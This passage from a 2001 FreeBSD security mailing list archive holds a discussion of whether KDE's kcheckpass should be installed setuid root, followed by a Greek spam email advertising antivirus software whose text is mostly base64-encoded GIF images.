[24.189.108.170]) by hub.freebsd.org (Postfix) with SMTP id 0238F37B403 for ; Wed, 24 Oct 2001 16:14:46 -0700 (PDT) Received: (qmail 52449 invoked from network); 24 Oct 2001 23:06:15 -0000 Received: from 21.mumf.nyrk.nycenycp.dsl.att.net (HELO quadtelecom.com) (63.242.250.21) by 26.mumf.nyrk.nycenycp.dsl.att.net with SMTP; 24 Oct 2001 23:06:15 -0000 Message-ID: <3BD74962.9900EF9F@quadtelecom.com> Date: Wed, 24 Oct 2001 19:06:10 -0400 From: Harry Tabak Reply-To: htabak@quadtelecom.com X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Frank Tobin Cc: Will Andrews , security@FreeBSD.ORG Subject: Re: KCheckPass -- make it setuid root or not? References: <20011019133826.O4565-100000@palanthas.neverending.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A modest suggestion! Warning messages during make() which explain why an expected feature won't work, do not necessarily reach the intended audience. For instance, some people build their systems from binaries. Therefore one of the following decisions needs to be made: a) setuid executables are a necessary evil, and therefore kcheckpass is built setuid. b) setuid executables are absolutely evil, remove kcheckpass and programs that depend on it. c) fence straddle. Leave it to the user, but modify kscreensaver so that it will not lock the system unless kcheckpass can unlock the screen! Display a GUI message explaining the problem when this occurs. - Harry Tabak Quad Telecom, Inc. Frank Tobin wrote: > > Will Andrews, at 12:07 -0500 on 2001-10-19, wrote: > > OK, so I keep getting mail every now and then from people who can't > figure out why kcheckpass / kscreensaver won't authenticate their > password(s). 
It's because I decided to play it safe and made > kcheckpass non setuid root, which it needs in order to call > getpwnam(). > > Why would you choose to make it non setuid root? Isn't the warning that > is associated with all setuid-installed programs enough? Not installing > it setuid-root would be like installing sudo without setuid; it's > pointless without the bit set. > > You can't count on the warning messages to get to the user; if someone > goes to ports/x11/kde2, and does "make install", the message is going to > be buried in the middle of compiling kdelibs, kdebase, kdemultimedia, > kdenetwork, etc. > > -- > Frank Tobin http://www.neverending.org/~ftobin/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 21:31:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from zeus.marinet.gr (www.marinet.gr [62.1.205.9]) by hub.freebsd.org (Postfix) with ESMTP id 5D6EF37B405; Wed, 24 Oct 2001 21:23:19 -0700 (PDT) Received: from athena ([62.1.154.6]) by zeus.marinet.gr (8.9.3/8.9.3) with SMTP id VAA06905 for ; Wed, 24 Oct 2001 21:05:36 +0300 Message-ID: <001001c15cbc$49e2ec60$120152a6@marinet.gr> From: "Sotiria Petrou" To: Subject: =?iso-8859-7?B?TWFyaW5ldCAtINDRz9PUwdTF2NTFINTPIMPRwdbFyc8g08HTIME=?= =?iso-8859-7?B?0M8g1M/V0yDJz9XTIA==?= Date: Wed, 24 Oct 2001 21:42:50 +0300 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_000A_01C15CD4.D549F2E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org
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 tVQIAAA7 ------=_NextPart_000_000A_01C15CD4.D549F2E0 Content-Type: image/gif; name="norton_antivirus.gif" Content-Transfer-Encoding: base64 Content-Location: http://www.marinet.gr/sales/antivirus/images/norton_antivirus.gif R0lGODlhbgCPANUAAP////7NAPwKFJBsA66NAxEGAv/sAfSxA+fylP/TAf+gpqWlotSlAf/xAcvK x/9OW/7kAVAuCf/bAWVpZ9y4NteLAp/wZf/M0OzEAejo6N22F9G4YuG1Af3SGbKbSPj4+PDw8P/0 xMOjAf7r7f/09My0Af/6+nFcAv96gtevFNBcAdXCBfv///798//f4f7gWf3+/PjbAv/UIvTgAfXP AezWAN3c3dzLNsTMnPf393b5Ff7XBvv7+/3kEO7/4fr9+SH5BAAAAAAALAAAAABuAI8AAAb/QIBw SCwaj8ikcslsOp/QqHRKrVqv2Kx2y+16v+CweExGfkC5T269/rjf8Libx4PZ7WUyLJex+XkAeEN3 hIUwdIg8cGyMjWxqaY9yk5STdFMZCws2Dg42RCELE595SDCBhqmChXSCURkDEaKbLEIhNwW5DqVW p0I/gVoZFBOefkMIHRG5ETl+nDYZfZzSGb68RAgW2zoIRddSGTgO0zanLS89CAu5Nprv8O/medX1 MNrbFt7Cftt+vi8a9KAQIQKnBZ0cvFOoyROgMTziIbyHoKK+LX1w+LMWKEQHDAxksXB2KJGiSHW4 EAJE50O9agAqWtwnBFw4Gzg0HhPCIsSL/w0LWNSyOQZEQoUMkR79tG3mtyoZdc6rSUcoNiEg/JDL YIyrp06bADTVRhNLRn9TB12tgkCH224Yceqw8G8I1w8OchQBkWEtkxY+KvrY8mzBuKksbBRwMMHr 
Bz8TJgDwxKJPX79EiJpVGHkBRwCJC3TuLCvCBFGnTUv2e0pzFq7yPk+ObJrzhA+aiqG2cftqrTGW M25o4YvxgtrHJee2naF3F9dFfgfrghPHBgoMNLTgybs5alEsjn9v7NwKNU9cqVGB/gQ7g/fZtw+p VQsECBYs72e4/wFADvZPKOQVNLssAWAV7sGnAQlFXKDABSaoNd8QPJhwigIPjHDBBQwCsP/hCAqg MB04XpXYyWWmiJHge9pN+IAAAlzg2ikXPKCAEC9eAOONJOwIY4dGdAINJwImIR0YK8ZHhAswCnBj TUeg4KQQDprw4o1MCuDChqYcAsAHdgw1HWhG2HRge+9xwKJ8Fwrw4gNUPngBCihcAACGbipAggJ6 KuCmCTo+YAKfgD5Yp4MuwOCgnSCioMCWLpQ5hIMKjNBFgmpqEOEQUvopgBCeNhmjqAKMkGOgdwqA ggkwmiAljHRO6ScKMLwIK5dIYPjArk+OiSB8ImQHZK0x5piqk54qYKWqJCzLIYwAdArAj1I+UKe0 swbqwoMphtpkpBP+ygEBEYjQYiA9CgD/A7Z/EnvjlQA4S2yNMbIqAAnSujuoqjo6CeCbu+64BXbj RqAkqH/6CafCOPrbKQzydtqqvfhOCcCV+4po6wPgQjnECDBaG/ADZzZBMAEnKHnKqwF/qvAp8GLs bKrVwpBuxQrA7O+sJozAchJM7iq0m+GKS8AAB19MaqkvK/2uv/JmOeXNDzsdraoWekg0EqaGbKuI Wpyc8rnpVurClQxbXe0D9Nq5bIwAUG0xy7AG/aYSrzZp48DviUBAdhEq+mPDfBLt7rFOGrvujzZT a7HUUqIAcsgdH3G2rVhL+CsDKB+8rYxCfP55IB/GCeGWHULamguRkuACkBoyOAKDrkPI/8ScvFbe EQIvTHEy0ufeobkSWU8xoxM/9DzCNS2EgIAMHQQQgO/vHZ30FkfylMTxTjTPuwzShz+9FL8fXHL2 2mPj/Qvgi+8+9ZwDTxxmkpriPe/Ru6+/9PBbryn9SoBB85zHvvzt74D8I1/f/nauI5QMCy0YIAEL uL8EJACB0rtg+KinAhWwqCIhCGEEXXGFO0QwhCGsyAvYB70daDAAL8QgDGU4vihgRwUC8KAGDBiA DnRABisMokyGSEQiBjGIMkhiB1xowQtacAdMbKIULSi+F1KRhvDDYXZ4SMMu6m+KYAyjGDUYQy9y MIdb9KIaYThGKUIxigmAYhybKAE4Tv9xhk6coR5rCIUbViBTXFxjFdvYxDdKIAE0oIEEFslIRiaS BhhQZAIaeUgaBAADUsQAJmnAgA0qsIMVSKMar0hIMEJxkZPkwAAGIAIMcIAGJSgBA0SgyqMN4G80 IAAB/GbLWupylcAcgCdtyIAO6jCQNHTiC+1YSEM2MpcDOIE0MXCCgkQzmicQwSqpKU1sEgADwZSm OIWZQGIyoAKh3GEXy2hBAnBAArfEwCFdSM8dUJKRNfjlLWOwyqPt8mgr8FsuealLEQTgb7r8pwgW Osw+FhON6kwmGScZAINhIBcMqOMc7XnPRsbgozGYAQRGSlIJQGAGiySpSlG5SDnesZz/Dq2ACtKJ zANKUQLgVEEsIlCBALSUox1NqQGGCgEMrMAAJy1BDEoKgY9y4J3jeiUkMbBH/VFPpsdEYAw1SNUA qOAE0YzACWY6SXsClZEr/Wc/A2rLX2LAlv0MZjQZcEU2iu+MAhAlBrn6ngNUYBkoi+ZMfdpRlY6U m9dkZWJXmU0RgJWxch2APMlY1auiU69aveABGHAAv+ZirMCswCQpadiRGgCcIijBQlfQAAyUYAUr UG0JNBlLTa5AkzXAQAxocMcyXnWmmK0gFTfb2b8WoCAnCCVhG1lakhqgAdCFLlKfG13pUpeoJWVk 
FPd3xplGNLPDPcAlZTqAApwAkyNF/2tzIYDU5hJ1qPCNb3O1K0WrKvA9NJVhMzkagOIWgAArXa9h qVvdBsT3wO0tbSO3+z4FyjSv3/0iGy2oXQyIlwMR4ECC3Wta6kpgXP0UAQ2si2D4Kpi+ZeQjmjrI oppO+ImnTMBmLxkBDAjYtOx9LjiXkYsemxcDBi6xfFfa0iY2mJg4zCp4ndnfA+wAAxm+sWkbwE9m gPWXBckFAYIs5A1DoJFGvqsCOSDTCkTYfW5sZJPtGQECeFmlQ23tMgwGgQJD4ADl/S+Xu0xkjdZV xU64IYvPPEgKq7mzJo2FgOHLgGqK4LkIhu4OjDviLps4uwyG6Yoh6uJmHvoAJmVAAf8wMF0cs7cB IfmmpSVdAT1bGrvpLXIMf5tfmz6RkjvobAIgsIOCJPjXUD5Bpbss3QMUhMR8jrWfxYxkTtva0GiV QH8DMFIOuNq5BthBNTmw50hHNwDVJDGyL63sMAPaZPhV8hdvzVwINHnXECivCLrdahWsGtLQTYBY CxxdBPeZiQ1F0zlrjeZCtnuk/ZXnl09QgHnDt6I1DvKe+Q1dDM+b4t1OMIoDHuiHejAFyEyzekf6 ZPGmt7xubgAERD2AcRO4wAaIZp0x7m9lA1zTHQcuA0Au3DgenKQyNvmXy1vjHZSX296muC6BjPFx Z3fZOEc3KIObQWinFM7u7iy12Rv/kuP6ut8vL/AMYsGApsP80huPOhNumMMS8LzgPh851oPu0zrH u8cD4MDMKX5acrU57E0f8pf9rEHLhvLthT7repGKU62z16s+Pu4t/6nLajKD22Y/O6xlXfhPshjx 4TO43OFM1CaLt5j/hYA2eRx5ZgC435lHNqbDzMHPB1L0Vyf9gSGg2QOooADClMAMdgsSAuh0AB6U QOz5Tm7Oq30Jgj787a2+eCG7u9XJHfhlGcAB3dJ8+YJ3/rnXDp/3gL7qcTdpaYltgAC0uuVojXPs Ac/v8BP++UrATgqus/Ppp9+9lhYAonYCBrZ8Blhd9sdg8MN/5zdhQAWAXdZfXwdz/3x3gLIXawp4 Xwzofw+4fkJmYDQ2agVIfxRogPZ3SFe0gPrHgaPXYR/4ZL+3ZYCHbxaIgM13f+MHfe+xgev2fwO2 akUlahEwcyQoXbA3fzeYgebEg3DXgboXgAfAcFtWg+CXhHWlgiLQgLjngauGU61WAEoVP7sUA1So eRoHdTmYfzu4gj3ohNj2gZB2SXnGesyANHtXgwl4heQTLBuQAv3Xhi34agUobX/FYwWRZa5HhAc4 ZGmXhkngHhuwAX/YhIF4b/kmTt8UA9LmV5Z3XBe3iGgnaxyHbjtnfiGXfur3hh8oXdamAvzWAzsg gBUQC69ngjeIgszmUOXXgBP2c/85dm+T1nDVxWtQhAHb90c0cIeBd4t/Bj/wwYt0NHrsB13uRgDC +Fy8lmO8Jj0g0Vc0EHbgyIyzdl/PeIo++ITxJXGECHzS1QMkaABBp0nfuIybh4aOiARJAo3slnsu CF8j+FybuAwqtwMliIAldwCR9HKQlofjaE7l2HOKh46RVlTU9F8J0AMmmAAWhpAxoJCMKIqjSH67 WFNbKJEHBoLud1wjdoRFaAA0sFmvtHe7N3j26Iym+GwRqYol1gCXZGx6RoVZx5ELGYo1SY43aWs5 2Y/ehlPgdFw1UIYNIAGbFUlEiF2MZG73eAT52Gn7mIpKmY4qZ2GFOAMFGXvuxln/uiWODamLD/ls o8WPX+mP7ddZM4V5CGiB8ZiMVolKvmWUk9hzqPiDO9kAdEcDFaCMiwhdUomQaVlufemQR+mWvnhv MhYABvBHZTl/KtdZmtSRNPlnWWkEW7lXuOeVv+htFHlaFVCESAiCCMkAHQmSIamDI6lfXcmFkTaX 
BMkATHddgSdxRmhgYskABiCb+PeI5feXkumLpwmWuRYADWCYBMaaBXiX2NiNxWmPoVkEo6lV6Eda OnmS7UdqqMZ01pV5Q+mPMpaMfNmMfsmLGfRip5SKM/le/iiVCRCdqzmCwEmB/gicNMABS9WeR8aW kWlXmURVAZpIrhRLqUUAswWh/wu1S3UGX5r0XLzpcvV3npCWT600eDeXiwLXlpdESwvFOQSVUI4F Vo91SwEVULWVjjKmfDtAnDbobenZANYYAQMQa1h5nPiYnIgHTrc0ebt0orMUoJoUSTUwA07aVE6a WyXAZXdmmQ3QfRK3iifZAAxXAAzwmSm2nUTQnZe0pF1lpt33VK51pE9VUKp1NH6Tjv2lfBLAAGSZ cWAplwZgjQUwoNoJpFoppAaEAbzESipqpL/ES6m1WrmlSU56YFJppa6UnrkZXyAxi3p3lWEqpkNA puCkULuUpk/FoJi0A5Ckl+0FhRX6SmBXqUNVp5cFpps6BR7wNyTag3R0a/Opfv9L9WUnlVuQKl6v KqBclnHWdWedtQMg+qOzqQS3lCZ/CUYThkmvVKaQxJuxJKHflFAlkKpDNacGlgB6h6fPtUtBRmSZ Zl9R4AEiAFux9F0cQEuz1Eq/tEvXJE1/M3l+M0sDEFuwVQPTNV1SaWMGBkkfOAPLAGSYhosYRKup xUorEFHiylhg1Wj+xDkFxX2PxFsJoImKdGNz+Y1DhUg72aUtZ3PMWqDtUaivNahpQlWaJD6a9FR2 JEdnZZoqBa7fupJxZgAiwGMDkJ0EuqnN+ojxBKEr0D7S81T7qqL1uksTVUioaFJwObDa2JlIpUrS ZF4olrLqCgU3AKcQqgFK+1b/T8s53PdU3VdoN3Wzo1eZplWjCaVLFSBNmepSRPu1TxC2a0W2Mis9 vElKpSRFkIRIkcRcqThtODZVA3cAZYWCf5a3nCoEN+A3RgVbStuLhKuRZVqmvMm0lIexcBpUXzZt jQQSHLBrnEdFoIlAU3ADJQCxsGVAASqAahIstzShiLqtT0tLahKv8rSrC2Z6nSVeXUtZa/S6sTsA ryWxHNCi3XQCutQ33OdKHHBJnRQAljRVaUpLKGhWwxt6mlpfglS0SFC5Rzq74UOovhuzMEtVojpL R4qxhjq3uwS5dGRIZsVMVlRVXaS8EBpLSSuzaiq//vRLqoSo3DdLvGmm6De4+S8VeuV7QcrbrrH1 XUSad6C6wN3bVQ88YVUXn4QkwaHHTmNUpmrrO7H0Wm6XPxrZwAFwvQ+sTBJWwiEsXHo0uCj8VH3j AZE4DugBAlRAASsMW1rov6OEvDPsRnHkQjt8uyLgAT6cE36wH0iywq8Fn+XLthTmxJektvIbxR6Q EzhQxUK8FtghS7FFAC5WRXAHY1xlvQYsxRtwGDZgHwCEBDmQu7E0AKCnTNFIRUt6uwlFx4ZxIrKR x1AAG8C0Q148yAZMAFKsCUAsDQ+kyFLAAzhRq5LsAZSMyA+ByaI8yqRcyqZ8yqicyqq8yqzcyq78 yrAcy7I8y6ocBAA7 ------=_NextPart_000_000A_01C15CD4.D549F2E0 Content-Type: image/gif; name="mcaffee_office.gif" Content-Transfer-Encoding: base64 Content-Location: http://www.marinet.gr/sales/antivirus/images/mcaffee_office.gif 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 
